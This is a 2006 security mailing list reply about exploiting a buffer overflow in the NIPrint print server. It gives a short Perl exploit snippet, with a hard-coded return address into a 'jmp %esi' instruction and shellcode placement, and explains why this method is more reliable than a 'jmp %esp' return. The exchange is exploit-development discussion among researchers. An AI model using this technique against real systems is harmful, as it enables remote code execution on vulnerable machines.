Dailydave mailing list archives

Re: VisualSploit redux


From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Tue, 23 May 2006 17:35:38 -0500

On Tuesday 23 May 2006 06:18, Dave Aitel wrote:
> Anyways, there's a movie here:
> http://www.immunitysec.com/documentation/vs_niprint.html

Not to nitpick, but there is a better way to exploit this bug:

'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236] ],

my $req = Pex::Text::AlphaNumText(8192);
substr($req, 0, 2, "\xeb\x33");
substr($req, 49, 4, pack('V', $target->[1]));
substr($req, 53, length($shellcode), $shellcode);
$s->Send($req);

This will return to a "jmp %esi", where %esi points to the source string 
before the memory overwrite. The benefits of this vs the "jmp %esp":
* Our code isn't running so close to ESP (easy to fix w/prepend)
* More room for the actual payload (could even embed the ret)
* The return address will work regardless of OS/SP combo

Fun stuff, keep up the demos :-)

-HD
